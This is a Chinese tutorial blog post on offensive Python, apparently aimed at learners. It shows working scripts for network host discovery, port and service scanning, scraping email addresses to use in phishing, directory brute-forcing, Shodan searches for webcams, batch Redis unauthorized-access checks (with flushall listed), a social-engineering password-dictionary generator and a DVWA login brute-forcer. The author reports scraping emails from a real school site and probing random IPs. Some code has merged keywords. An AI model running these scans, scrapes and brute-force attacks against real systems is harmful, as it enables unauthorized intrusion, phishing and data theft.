居家隔离****闲着无聊
思来想去决定写篇关于【 P y t h o n 攻 防 】 \color{blue}{【Python攻防】} 【Python攻防】专栏没办法-越🥦越想学
网上有《Python安全攻防》📕
想深入学习的👦可以买
我没买–毕竟我喜欢白嫖🤪
⛰前言⛰
- 随着近几年互联网的发展,Python在各行各业发挥着举足轻重的作用。除应用在科学计算、大数据处理等人们熟知的领域外,在信息安全领域中使用也异常广泛。这是因为对于渗透测试工程师来说Python语言不仅上手容易,而且还有大量丰富的开源库。通过Python可以帮助他们又好又快的完成一项任务,以少量的代码便可实现所需功能。从而借助Python打造更安全的💻。
国家网络安全法
敲重点👉中华人民共和国网络安全法👈建议倒背如流
🌋正文🌋
一、Socket网络编程
网络调试助手:https://pan.baidu.com/s/1Do-v8XMDaIYJsXRQok5RhQ 提取码:ya4g (便于测试)
套接字(Socket)是计算机之间进行通信的一种约定。通过Socket,一台计算机可以接受其他计算机的数据,也可以向其他计算机发送数据。远程管理软件和黑客软件大多依赖于Socket来实现特定功能的,其包括两个部分:运行于服务器端称之为ServerSocket,运行于客户机端称之ClientSocket。
TCP
TCP是因特网中的传输层协议,使用三次握手协议建立连接。
TCP_Client.py
import socket
defmain():# 创建TCP套接字
tcp_client_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)# 服务器地址
sever_ip =input("请输入服务器ip:")
sever_port =input("请输入服务器端口:")# 连接服务器(元组)
tcp_client_socket.connect((sever_ip,int(sever_port)))# 输入发送的数据
data =input("请输入要发送的数据:")# 发送数据
tcp_client_socket.send(data.encode("utf-8"))#接收数据
recv_data = tcp_client_socket.recv(1024)print("对方的回复:"recv_data.decode("utf-8"))if __name__ =='__main__':
main()
nc -lvp 8888
监听8888端口
(一次完整对话)
TCP_Sever.py
import socket
defmain():# 创建套接字
tcp_server_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)# 绑定本地IP和端口
tcp_server_socket.bind(("192.168.12.1",8888))# 被动 listen
tcp_server_socket.listen(128)whileTrue:# 等待客户端信息print("等待客户端连接")
client_socket,client_addr = tcp_server_socket.accept()print("客户端为:",client_addr)#接收对方发送数据
recv_data = client_socket.recv(1024)print("接收到信息为:",recv_data.decode("utf-8"))#发送数据到客户端
client_socket.send("Yasso".encode("utf-8"))
client_socket.close()if __name__ =="__main__":
main()
UDP
UDP 为应用程序提供了一种无需建立连接就可以发送封装的 IP 数据包的方法。
UDP_Client_send.py
import socket
#创建udp套接字
udp_socket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)# 目标ip和端口
target_addr =('192.168.12.128',8888)#获取数据
data =input("请输入要发送的数据:")#发送数据
udp_socket.sendto(data.encode('utf-8'),target_addr)
udp_socket.close()
UDP_Client_receive.py
import socket
#创建udp套接字
udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
local_addr=('192.168.12.128',8888)#绑定ip(必须本地)和端口
udp_socket.bind(local_addr)#等待接受对方发送的数据
recv_data = udp_socket.recvfrom(1024)#表示本次接受的最大字节数1024# 显示接受的数据print(recv_data[0].decode('utf-8'))
udp_socket.close()
liunx等待接受数据->win10发送数据->liunx成功接收数据
nc -ulp 8888
监听udp模式下的8888端口
私密聊天室
# UDP应用-私密聊天室(极简)import socket
defsend(chat_ip,chat_port):
udp_socket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)"""发送消息"""
address =(chat_ip,int(chat_port))print(address)
data =input("请输入发送的消息:")
udp_socket.sendto(data.encode("utf-8"),address)defreceive():"""接收消息"""
udp_socket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)# 绑定本地IP和端口
udp_socket.bind(("192.168.12.1",8888))
recv_data = udp_socket.recvfrom(1024)print(recv_data[0].decode('utf-8'))defmain():
chat_ip =input("请输入您聊天对方IP地址:")
chat_port =input("请输入您聊天对方端口:")# 循环调用whileTrue:print("++++++欢迎进入私密聊天室++++++")print("0:发送消息")print("1:接收消息")print("2:退出聊天")
function =input("请输入您要用的模块")if function =="0":
send(chat_ip,chat_port)elif function =="1":
receive()elif function =="2":breakelse:print("输入有误,请重新输入")if __name__ =='__main__':
main()
二、Scapy网络嗅探
Scapy是一个可以让用户发送、侦听和解析并伪装网络报文的Python程序。这些功能可以用于制作侦测、扫描和攻击网络的工具
pip install scapy
安装scapy
pip install ipython
安装交互式shell
Scapy是一个强大的交互式包操作程序。它能够伪造或解码大量协议的数据包,在网络上发送它们,捕获它们,匹配请求和响应,等等。Scapy可以轻松地处理大多数经典任务,如扫描、跟踪、探测、单元测试、攻击或网络发现。它可以代替hping、arpsoof、arp-sk、arping、p0f甚至Nmap、tcpdump和tshark的某些部分
TCP发送数据
TCPsend.py
# -- coding: utf-8 --import time
import threading
import sys
from scapy.allimport*# 数据包应用层数据部分
data ='flag{flag_is_not_here}'# src:源地址 、sport:源端口、dst:目标地址、dport:目标端口
pkt = IP(src='192.168.12.128', dst='192.168.12.166')/ TCP(sport=4444, dport=6666)/ data
# 间隔一秒发送一次 总共发送5次 发送网卡口(iface):eth0
send(pkt, inter=1, count=5, iface="eth0")
基于ICMP协议的存活主机探测
ICMP协议是一种面向无连接的协议,用于传输出错报告控制信息。它是一个非常重要的协议,它对于网络安全具有极其重要的意义。 属于网络层协议,主要用于在主机与路由器之间传递控制信息,包括报告错误、交换受限控制和状态信息等。当遇到IP数据无法访问目标、IP路由器无法按当前的传输速率转发数据包等情况时,会自动发送ICMP消息。
判断是否为活跃主机,只需要向其发送一个ICMP请求,如果这台主机处于活跃状态,那么它在收到这个请求之后就会给出一个回应。
# -- coding: utf-8 --from scapy.allimport*# 构造IP包头构造ICMP包头加载发送数据包函数for i inrange(1,254):# 整个个网段
ip="192.168.12."+str(i)# 设置IP地址
pkt=IP(dst=ip,src="192.168.12.128")/ICMP(type="Echo-request")#ICMP包的类型为Echo request——回显请求(Ping请求)
rep=sr1(pkt,timeout=1,verbose=False)# 发送和接受数据包,超时时间为1秒,设置无过程回显。# 如果该数据包有回应则输出if rep:print("The "+ rep[IP].src +" is live")
基于TCP/UDP的主机发现
基于TCP、UDP的主机发现属于四层主机发现是一个位于传输层的协议。可以用来探测远程主机存活、端口开放、服务类型以及系统类型等信息,相比于三层主机发现更为可靠用途更广.
TCP
工作原理主要依据目标主机响应数据包中flags字段,如果flags字段有值,则表示主机存活,该字段通常包括SYN、FIN、ACK、PSH、RST、URG六种类型。SYN表示建立连接,FIN表示关闭连接,ACK表示应答,PSH表示包含DATA数据传输,RST表示连接重置,URG表示紧急指针。
# -- coding: utf-8 --from scapy.allimport*for i inrange(1,254):# 整个个网段
ip="192.168.12."+str(i)# 设置IP地址
pkt=IP(dst=ip)/TCP(flags="A",dport=4444)#响应数据包中flags值判断主机是否存活
rep=sr1(pkt,timeout=1,verbose=False)# 发送和接受数据包,超时时间为1秒,设置无过程回显。if rep:# 如果该数据包有相应则输出print("The "+ rep[IP].src +" is live")
UDP
UDP是向目标主机一个没有开放的端口发送数据,目标主机会返回一个目的端口不可达的ICMP报文,以此来判断主机是否在线。如果主机不在线,或者目标端口开放,UDP探测是不会收到响应包的。
# -- coding: utf-8 --from scapy.allimport*for i inrange(1,254):# 整个个网段
ip="192.168.12."+str(i)# 设置IP地址
pkt=IP(dst=ip)/UDP(dport=6666)
rep=sr1(pkt,timeout=1,verbose=False)# 发送和接受数据包,超时时间为1秒,设置无过程回显。if rep:# 如果该数据包有相应则输出print("The "+ rep[IP].src +" is live")
wireshark拦截
基于ARP协议的主机发现
地址解析协议,即ARP,是根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到局域网络上的所有主机,并接收返回消息,以此确定目标的物理地址;收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。
ARP
对以太网内的每个主机都进行ARP请求。若主机存活,则会响应我们的ARP请求,否则不会响应.因为ARP涉及网络层和数据链路层所以需要使用Scapy中的Ether和ARP。
# -- coding: utf-8 --from scapy.allimport*for i inrange(1,254):# 整个个网段
ip_list=[]
ip="192.168.12."+str(i)# 设置IP地址# 发送ARP包# 二层发包,需要添加以太网头部,所以要写成Ether/ARP# 因为最底层用到了二层,所以要用srp()发包
ans=srp(Ether(dst='FF:FF:FF:FF:FF:FF')/ARP(op=1,pdst=ip,hwdst='00:00:00:00:00:00'),timeout=1,verbose=False)if ans[0].res:print("The "+ip+" is live")
三、信息搜集
IP查询
IP查询是通过当前所获取到的URL去查询对应IP地址的过程。可以应用Socket库函数中的gethostbyname()获取域名所对应的IP值°
import socket
domain =input("请输入要查询的域名:")
ip = socket.gethostbyname(domain)print("IP地址为:",ip)
Whois查询
whois模块查询域名www.baidu.com的注册信息
pip install python-whois
安装模块
from whois import whois
data = whois('www.baidu.com')print(data)
子域名挖掘
域名可以分为顶级域名、—级域名、二级域名等。子域名(subdomam)是顶级域名(一级域名或父域名)的下—级。例如mail.example.com和calendar.example.com是example.com的两个子域,而example.com则是顶级域.com的子域。在测试过程中测试目标主站时如果未发现任何相关漏洞,此时通常会考虑⛏︎目标系统的子域名。子域名⛏︎方法有很多种,例如,搜索引擎、子域名破解、字典查询等。
import requests
from bs4 import BeautifulSoup
from urllib.parse import urlparse
import sys
defbing_search(site,pages):
Subdomain =[]
headers ={#HTTP Headers是HTTP请求和相应的核心,它承载了关于客户端浏览器,请求页面,服务器等相关的信息'User-Agent':'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36',#是HTTP协议中的一部分,属于头域的组成部分,是一种向访问网站提供你所使用的浏览器类型、操作系统及版本、CPU 类型、浏览器渲染引擎、浏览器语言、浏览器插件等信息的标识'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',#属于请求报头,代表发送端(客户端)希望接受的数据类型'Referer':"https://cn.bing.com",#表示一个来源}for i inrange(1,int(pages)+1):
url ="https://cn.bing.com/search?q=site%3a"+site+"&go=Search&qs=ds&first="+str((int(i)-1)*10)+"&FORM=PERE"
html = requests.get(url,headers=headers)#获取HTML网页,对应HTTP的GET
soup = BeautifulSoup(html.content,'html.parser')
job_bt = soup.findAll('h2')#返回一个包含HTML文档标题标签h2的列表for i in job_bt:
link = i.a.get('href')
domain =str(urlparse(link).scheme +"://"+urlparse(link).netloc)#储存子域名if domain in Subdomain:passelse:
Subdomain.append(domain)print(domain)if __name__ =='__main__':iflen(sys.argv)==3:
site = sys.argv[1]
page = sys.argv[2]else:print("usage: %s baidu.com 10"% sys.argv[0])#输出帮助信息
sys.exit(-1)
Subdomain = bing_search(site,page)
python Subdomain.py baidu.com 20
数字20表示获取Ping引擎页数
力推👉️在线子域名查询👈️
邮件爬取
在针对目标系统进行渗透的过程中,如果目标服务器安全性很高,通过服务器很难获取目标权限时,通常会采用社工的方式对目标服务进行进一步攻击🤺。针对搜索界面的相关📩信息进行爬取、处理等操作之后。利用获得的📫账号批量发送🎣📩,诱骗、欺诈目标用户或管理员进行账号登录或点击执行,进而获取目标系统的其权限。
import sys
import getopt
import requests
from bs4 import BeautifulSoup
import re
#主函数,传入用户输入的参数defstart(argv):
url =""
pages =""iflen(sys.argv)<2:print("-h 帮助信息;\n")
sys.exit()#定义异常处理try:
banner()
opts,args = getopt.getopt(argv,"-u:-p:-h")except getopt.GetoptError:print('Error an argument!')
sys.exit()for opt,arg in opts:if opt =="-u":
url = arg
elif opt =="-p":
pages = arg
elif opt =="-h":print(usage())
launcher(url,pages)#banner信息defbanner():print('\033[0;31;42m 爬虫不控频,亲人两行泪 \033[0m')#使用规则defusage():print('-h: --help 帮助;')print('-u: --url 域名;')print('-p: --pages 页数;')print('eg: python -u "www.baidu.com" -p 100'+'\n')
sys.exit()#漏洞回调函数deflauncher(url,pages):#调用bing_search()和baidu_search()函数并且将bing爬到的和baidu爬到的合并去重
email_num =[]
key_words =['email','mail','mailbox','邮件','邮箱','postbox']for page inrange(1,int(pages)+1):for key_word in key_words:
bing_emails = bing_search(url,page,key_word)
baidu_emails = baidu_search(url,page,key_word)
sum_emails = bing_emails + baidu_emails
for email in sum_emails:if email in email_num:passelse:print(email)withopen('data.txt','a+')as f:
f.write(email +'\n')
email_num.append(email)#bingSearchdefbing_search(url,page,key_word):#绕过Bing搜索引擎反爬(校验referer和cookie)
referer ="http://cn.bing.com/search?q=email+site%3abaidu.com&qs=n&sp=-1&pq=emailsite%3abaidu.com&first=1&FORM=PERE1"
conn = requests.session()
bing_url ="https://cn.bing.com/search?q="+key_word+"site%3a"+url+"&qs=n&sp=-1&pq="+key_word+"site%3a"+url+"&first="+str((page-1)*10)+"&FORM=PERE1"
conn.get('http://cn.bing.com',headers=headers(referer))
r = conn.get(bing_url,stream=True,headers=headers(referer),timeout=8)
emails = search_email(r.text)return emails
#baiduSearchdefbaidu_search(url,page,key_word):#绕过百度搜索引擎的反爬(JS请求链)
email_list =[]
emails =[]
referer ="https://www.baidu.com/s?wd=email+site%3Abaidu.com&pn=1"
baidu_url ="https://www.baidu.com/s?wd="+key_word+"+site%3A"+url+"&pn="+str((page-1)*10)
conn = requests.session()
conn.get(referer,headers=headers(referer))
r = conn.get(baidu_url, headers=headers(referer))
soup = BeautifulSoup(r.text,'lxml')
tagh3 = soup.find_all('h3')for h3 in tagh3:
href = h3.find('a').get('href')try:
r = requests.get(href, headers=headers(referer),timeout=8)
emails = search_email(r.text)except Exception as e:passfor email in emails:
email_list.append(email)return email_list
defsearch_email(html):
emails = re.findall(r"[a-z0-9\.\-+_]+@[a-z0-9\.\-+_]+\.[a-z]+",html,re.I)#正则表达式获取邮箱号码return emails
defheaders(referer):
headers ={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36','Accept':'*/*','Accept-Language':'en-US,en;q=0.5','Accept-Encoding':'gzip,deflate','Referer':referer}return headers
if __name__ =='__main__':#定义异常try:
start(sys.argv[1:])except KeyboardInterrupt:print("interrupted by user,killing all threads...")
试了下某学校网站,爬到不少
溜了溜了🎿🎿
端口扫描
import socket
import threading
defmain(target):print('开始扫描---')for port inrange(1,65535):
t = threading.Thread(target=hackport,args=(target,port))
t.start()defhackport(target,port):try:
res = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
res.connect((target,port))#双括号元组print("%s:%d 端口开放"%(target,port))
res.close()except:passif __name__ =='__main__':
target=input("请输入要扫描的IP:")
main(target)print('***扫描完毕***')
内网靶机
nmap -sV -p- 192.168.12.134
服务识别
from optparse import OptionParser
import time
import socket
import os
import re
SIGNS =(# 协议 | 版本 | 关键字b'FTP|FTP|^220.*FTP',b'MySQL|MySQL|mysql_native_password',b'oracle-https|^220- ora',b'Telnet|Telnet|Telnet',b'Telnet|Telnet|^\r\n%connection closed by remote host!\x00$',b'VNC|VNC|^RFB',b'IMAP|IMAP|^\* OK.*?IMAP',b'POP|POP|^\+OK.*?',b'SMTP|SMTP|^220.*?SMTP',b'Kangle|Kangle|HTTP.*kangle',b'SMTP|SMTP|^554 SMTP',b'SSH|SSH|^SSH-',b'HTTPS|HTTPS|Location: https',b'HTTP|HTTP|HTTP/1.1',b'HTTP|HTTP|HTTP/1.0',)defregex(response, port):
text =""if re.search(b'<title>502 Bad Gateway', response):
proto ={"Service failed to access!!"}for pattern in SIGNS:
pattern = pattern.split(b'|')if re.search(pattern[-1], response, re.IGNORECASE):
proto ="["+port+"]"+" open "+ pattern[1].decode()breakelse:
proto ="["+port+"]"+" open "+"Unrecognized"print(proto)defrequest(ip,port):
response =''
PROBE ='GET / HTTP/1.0\r\n\r\n'
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(10)
result = sock.connect_ex((ip,int(port)))if result ==0:try:
sock.sendall(PROBE.encode())
response = sock.recv(256)if response:
regex(response, port)except ConnectionResetError:passelse:pass
sock.close()defmain():
parser = OptionParser("Usage:%prog -i <target host> ")# 输出帮助信息
parser.add_option('-i',type='string',dest='IP',help='specify target host')# 获取ip地址参数
parser.add_option('-p',type='string', dest='PORT',help='specify target host')# 获取ip地址参数
options,args = parser.parse_args()
ip = options.IP
port = options.PORT
print("Scan report for "+ip+"\n")for line in port.split(','):
request(ip,line)
time.sleep(0.2)print("\nScan finished!....\n")if __name__ =="__main__":try:
main()except KeyboardInterrupt:print("interrupted by user, killing all threads...")
系统识别
根据按照目标主机返回的响应数据包中的TTL值来判断操作系统类型的原理
from optparse import OptionParser
import os
import re
defmain():
parser = OptionParser("Usage:%prog -i <target host>")
parser.add_option('-i',type='string', dest='IP',help='specify target host')
options, args = parser.parse_args()
ip = options.IP
ttl_scan(ip)defttl_scan(ip):
ttlstrmatch = re.compile(r'ttl=\d+')#正则匹配取出TTL值
ttlnummatch = re.compile(r'\d+')
result = os.popen("ping -c 1 "+ip)# 调用os.popen()函数执行ping命令
res = result.read()for line in res.splitlines():
result = ttlstrmatch.findall(line)if result:
ttl = ttlnummatch.findall(result[0])ifint(ttl[0])<=64:# ttl值小于等于64时,操作系统为linux系统print("%s is Linux/Unix"% ip)else:#否则就是windowsprint("%s is Windows"% ip)breakelse:passif __name__ =='__main__':
main()
敏感目录探测
#-*- coding:utf-8 -*-import requests
headers ={"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0"}
url =input("url: ")
txt =input('字典.txt')# 同级目录下的字典
url_list =[]if txt =="":
txt ="字典.txt"try:withopen(txt,'r')as f:
url_list = f.read().split('\n')except:print("error")for li in url_list:
conn ="http://"+ url +"/"+ li
try:
response = requests.get(conn, headers=headers)print("%s --------------- %s"%(conn, response))except:# print("%s --------------- %s" % (conn, e.code))pass
四、网络空间搜索引擎
平常用fofa,不过貌似最近摊上事了,域名被列入了黑名单
搜索引擎是指从互联网搜集信息,经过一定整理以后,提供给用户进行查询的系统传统搜索引擎对我们来说并不陌生,像Google、百度等,每天我们几乎都会用它们来搜索消息。与传统搜索引擎相比,网络空间搜索引擎有很大不同,其搜索目标为全球的IP地址,实时扫描互联网和解析各种设备,对网络中的设备进行探测识别和指纹分析,并将其扫描的目标信息进行分布式存储,供需求者检索使用。传统的网络空间搜索模型框架一般由五部分组成:扫描和指纹识别、分布存储、索引、UI界面以及调度程序。
网络空间搜索引擎🕷️能够帮助安全研究人员针对APT组织、攻击方式等情况进行分析;对于公司安全管理人员🧑💻,能够帮助他们进行网络资产匹配、安全评估等;对于安全白帽子,能够帮助渗透测试人员在与目标非交互的情况下搜集信息,例如,搜索资产、系统类型,开放端口等。
Quake网络空间测绘系统(360)
资产狩猎框架-AssetsHunter
Censys搜索引擎
Zoomeye(钟馗之眼)
Shodan(撒旦)
Zoomeye(钟馗之眼)
Zoomeye支持公网设备指纹检索和Web指纹检索。Web指纹识别包括应用名版本、前端框架、后端框架、服务端语言、服务器操作系统、网站容器、内容管理系统和数据库等。设备指纹识别包括应用名、版本、开放端口、操作系统、服务名、地理位置等,直接输人关键词即可开始检索。
设备检索指纹语法语法描述实例app:组件名组件名称app:“Apache httpd”ver:组件版本组件的版本号ver:“2.2.16”port:端口号目标系统开放端口port:3389os:操作系统目标操作系统类型os:linuxservice:服务名系统运行的服务类型service:“ssh”hostname:主机名目标系统的主机名hostname:google.comcountry:国家或者地区代码目标系统的地理位置country:UScity:城市名称目标系统所在城市city:“beijing”ip:指定的IP地址目标系统对应的IP地址ip:8.8.8.8org:组织结构所属的组织结构org:“Vimpelcom”asn:自治系统号自治系统编号asn:42839ssl:SSL证书SSL证书ssl:“corp.google.com”Web指纹检索语法语法描述实例app:组件名组件名称app:“Apache httpd”ver:组件版本组件的版本号ver:“2.2.16”site:网站域名目标网站域名site:google.comos:操作系统目标操作系统类型os:linuxtitle:页面标题网站标题site:Nginxkewords:页面关键字网站页面关键字keywords:Nginxdesc:页面说明页面描述字段desc:Nginxheaders:请求头部HTTP请求中的Headersheaders:Servercountry:国家或者地区代码目标系统的地理位置country:UScity:城市名称目标系统所在城市city:“beijing”ip:指定的IP地址目标系统对应的IP地址ip:8.8.8.8org:组织机构所属的组织机构org:“Vimpelcom”asn:自治系统号自治系统编号asn:42839
调用ZoomEye(钟馗之眼)的API接口实现自动化信息搜集
ZoomEye-API 分为两种验证方式,API-KEY 和登录验证
ZoomEye API手册
curl -X POST https://api.zoomeye.org/user/login -d '{"username": "28********@qq.com","password": "123456"}'
使用host方法,查询开放6379端口的服务器IP地址,并打印出检索到的lP地址和端口号
import requests
import json
from bs4 import BeautifulSoup
data_info ={'username':"z***@qq.com",'password':"P******X"}
respond1= requests.post(url ='https://api.zoomeye.org/user/login',json = data_info)
authorization ={'Authorization':'JWT '+"eyJhbGciOiJIU***kpXVCJ9.eyJpZGVudG*MzA1***********mJmIjoxN*I-ZMB0zG*tPZK11FCo"}
url ="https://api.zoomeye.org/host/search?query=port:6379&page=1&facet=app,os"
respond = requests.get(url = url,headers = authorization)
data = json.loads(respond.text)for line in data['matches']:print(line['ip']+': '+str(line['portinfo']['port']))
Shodan
Shodan主要获取互联网中设备中的服务、位置、端口、版本等信息,目前比较受欢迎的内容有webcam、linksys、 cisco、 nctgear、SCADA等。通过不同的搜索语法可以做到批量搜索漏洞主机、统计中病毒主机、进行弱口令爆破、获取shell等功能。
Shoda常用语法语法描述实例city:城市名称城市city:“beijing”country:国家或者地区代码国家的简称countIy:“CN”geo:经纬度经纬度geo:“46.9481,7.4474”hostname:主机名主机名或域名hostname:“baidu”ip:IP地址IP地址ip:“11.11.11.11”isp: ISP供应商ISP供应商isp:“China Telecom”org:组织或者公司组织或者公司org:“baidu”os:操作系统操作系统os:Windows 7 or 8port:端口号端口号port:80net:CIDR格式的IP地址CIDR格式的IP地址net:“190.30.40.0/24”versjon:软件版本号软件版本version:“4.4.2”vuln:漏洞编号漏洞CVE编号vuln:CVE-2020-0787http.server:服务类型http请求返回中server的类型http.server:apachehttp.status:请求状态码http请求返回响应码的状态http.stams:200
调用Shodan的API接口实现自动化信息搜集
使用Python去调用Shodan的API接口可以实现自动化信息搜集,首先需要注册🧑,在MyAccount中可以👁️APIKey.
Shodan API官方文档
import shodan
import json
Shodan_API_KEY ='q************************0'
shodan_api = shodan.Shodan(Shodan_API_KEY)# ip = shodan_api.host('8.8.8.8') # host()方法获取指定IP的相关信息# 搜索JAWS摄像头,并将IP和端口打印出来
results = shodan_api.search('JAWS/1.0')print("共有%s"%results['total']+"条搜索结果")for result in results['matches']:print(result['ip_str']+":"+str(result['port']))
小结🌇
作为渗透测试的👻-信息搜集,信息搜集的完整性决定了你渗透测试的结果.
工欲其事,必先利其器。让Python完全替代现有的渗透测试工具不太现实,但可以让我们更好的理解我们当今大多数渗透测试工具的原理,为我们以后⚒⚒⚒⚒⚒⚒工具打下基础。
五、漏洞检测与防御
Redis未授权访问漏洞
未授权访问漏洞可以理解为安全配置、权限认证、授权页面存在缺陷,导致其他用户🧑可以直接访问🔎,从而引发权限可被操作数据库、网站目录等敏感信息泄露。目前存在未授权访问漏洞的服务主要包括:NFS、 Samba、LDAP、Rsync、FTP、GitLab、Jenkms、MongoDB、Redis、ZooKeeper、ElasticSearch、Memcache、CouchDB、Docker、Solr、Hadoop等。
通过手工🛠进行未授权访问验证,在安装Redis服务的Kall系统中连接☌,如果目标系统存在未授权访问漏洞,则可以成功连接☌
redis-cli -h 192.168.12.128
在本地搭建的redis漏洞环境
keys *
查看key和其对应的值
get user
获取用户名
get password
获取登录指令
flushall
删除所有数据
info
返回关于 Redis 服务器的各种信息和统计数值
Python批量检测Redis未授权访问漏洞
import sys
import socket
'''
socket连接远程主机的IP及端口号,发送info命令.利用recvdata()函数接收目标
主机返回的数据,当时返回的数据含有'redis verslon'字符串时,表明存在未授权访问漏
洞,否则不存在.
'''# 随便找了几个ip测试下withopen('redis.txt',"r")as f:
url= f.read()defmain():for ip in url.split():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)# 限制超时1秒
s.connect((ip,6379))
s.send('INFO\r\n'.encode('utf-8'))# info命令返回服务器版本
recv_data= s.recv(1024)if"redis_version"in recv_data.decode('utf-8'):print(ip+":存在Redis未授权访问漏洞")else:pass
s.close()
f.close()if __name__ =='__main__':
main()
⛸️⛸️⛸️⛸️⛸️⛸️
漏洞防御与检测
Redis未授权访问漏洞产生的危害☠︎☠︎☠︎很大,甚至可以批量获取目标系统的权限,有必要针对该漏洞进行严格限制和防御。针对该漏洞的防御方式有很多,下面是常见的🛡︎🛡︎🛡︎方式:
1️⃣禁止远程使用高危命令。
2️⃣低权限运行Redis服务。
3️⃣禁止外网访问Redis。
4️⃣阻止其他用户👤添加新的公钥,将authorized-keys的权限设置为对拥有者只读。
六、数据加密
根据明文处理方式的不同分为序列密码与分组密码,根据密钥🔑的使用个数不同分为对称加密算法和非对称加密算法.
常见的对称加密算法包括DES、AES等
Python实现DES加解密
通过Cryptodome库函数实现对字符串进行DES加解密。由于DES为分组密码的加密方式,其工作模式有五种: ECB、CBC、CTR、CFB、OFB
from Crypto.Cipher import DES
import binascii
key ='12345678'# 密钥
des = DES.new(key.encode('utf-8'),DES.MODE_ECB)# ECB模式
text =input("请输入要加密的字符串:")# 要加密的字符串
text = text +(8-(len(text)%8))*'='# 数据块对齐# 加密
encrypt_text = des.encrypt(text.encode('utf-8'))#
Result1 = binascii.b2a_hex(encrypt_text)# 字符串转为16进制print("DES加密后:"+str(Result1))# 解密
decrypt_text = binascii.a2b_hex(Result1)
Result2 = des.decrypt(decrypt_text)print("DES解密后:"+str(Result2))
Python实现AES加解密
AES加密算法的轮函数采用代替/置换网络结构,包括S盒变换(ByteSub)、行移位变换(ShjhRow)、列混合变换(MixColumn)、圈密钥加变换(AddRoundKey)。
AES为分组密码的加密方式,其工作模式有五种: ECB、CBC、CTR、CFB、OFB.
from Crypto.Cipher import AES
import binascii
key ='abcdefghabcdefgh'# 密钥长度须为8字节
aes = AES.new(key.encode(),AES.MODE_ECB)# ECB模式
text =input("请输入要加密的字符串:")# 要加密的字符串需为8字节的倍数
text = text +(16-(len(text)%16))*'='# 数据块对齐# 加密
encrypt_text = aes.encrypt(text.encode())
Result1 = binascii.b2a_hex(encrypt_text)# 字符串转为16进制print("AES加密后:"+str(Result1))# 解密
decrypt_text = binascii.a2b_hex(Result1)# 16进制转为字符串
Result2 = aes.decrypt(decrypt_text)print("AES解密后:"+str(Result2))
Python实现MD5加密
MD5是以512位的分组来处理输人的信息,并且将每一分组又划分成16个32位的子分组,经过了一系列的处理后,算法的输出由四个32位的分组组成,将这四个32位的分组结合后将生成一个128位的散列值.
用Python实现MD5加密时用到的是hashlib模块,可以通过hashlib标准库使用多种Hash算法,如SHA1、SHA224、SHA256、SHA384、SHA512和MD5算法等。
from hashlib import md5
defmain(s):
new_md5 = md5()
new_md5.update(s.encode('utf-8'))print(new_md5.hexdigest())if __name__ =='__main__':
main(input("请输入要加密的字符串:"))
七、身份认证
身份认证攻击总的来说分为三种攻击🤺方式:
字典📕破解:利用工具提前生成好字典文件,只需让破解脚本对📕的内容逐一尝试破解即可。这种方式效率高,成功率一般。
暴力💣破解:这种方式最为粗暴,不需要📕。将所有可能性的密码组合(如字母+数字+特殊字符)全部进行尝试。这种方式需要花费大量的时间,效率很低,但是在没有其他条件限制的情况下肯定能猜到密码,成功率高。
混合破解:多种破解技术结合使用。这种方法效率高,成功率也较高。
Python社工字典生成
import itertools
defReadInformationList(infolist):for i inrange(1,3):
lines =input('请输入第%s个关键字:'%i)
infolist.append(lines.strip())defCreateNumberList(numberList):
words ="0123456789"
itertoolsNumberList = itertools.product(words,repeat=2)# 所有两位数for number in itertoolsNumberList:
numberList.append("".join(number))defCreateSpecialList(specialList):
specialWords ="~!@#$%^&*()_+`-=,/:><.\|"# 特殊字符for i in specialWords:
specialList.append("".join(i))# 创建Combinatjon()函数字典生成算法主体 可自定义组合算法# 关键字与两位数和一位特殊字符组合defmain(dictionaryFile):for a inrange(0,len(infolist)):for b inrange(0,len(numberList)):for c inrange(0,len(specialList)):
dictionaryFile.append(infolist[a]+ numberList[b]+ specialList[c])
dictionaryFile.append(infolist[a]+ specialList[c]+ numberList[b])
dictionaryFile.append(specialList[c]+ infolist[a]+ numberList[b])
dictionaryFile.append(specialList[c]+ numberList[b]+ infolist[a])
dictionaryFile.append(numberList[b]+ infolist[a]+ specialList[c])
dictionaryFile.append(numberList[b]+ specialList[c]+ infolist[a])for i in dictionaryFile:print(i)if __name__ =='__main__':
infolist =[]
ReadInformationList(infolist)
numberList =[]
CreateNumberList(numberList)
specialList =[]
CreateSpecialList(specialList)
dictionaryFile =[]
main(dictionaryFile)
Python后台弱口令爆破
🐵🐵🐵🐵🐵🐵🐵🐵弱口令🇾🇾🇩🇸🐵🐵🐵🐵🐵🐵🐵🐵
DVWA靶场 根据返回数据包的不同---💣成功与否,关键在于📕是否强大
import requests
defget_user(user):
a =open('username.txt','r')for i in a:
user.append(i.strip())defget_psd(psd):
b =open('password.txt','r')for i in b:
psd.append(i.strip())defmain():
cookiesDit ={'security':'low','PHPSESSID':'ridh5ntp6u7ua2lisb1469c2r4'}for c in user:for d in psd:
url ='http://127.0.0.1/dvwa/vulnerabilities/brute/?username={}&password={}&Login=Login'.format(c,d)
responses = requests.get(url,cookies=cookiesDit)if'Welcome to the password'in responses.text:print("success!!! 用户名:{},密码:{}".format(c,d))if __name__ =='__main__':
user =[]
get_user(user)
psd =[]
get_psd(psd)
main()
SSH暴力破解
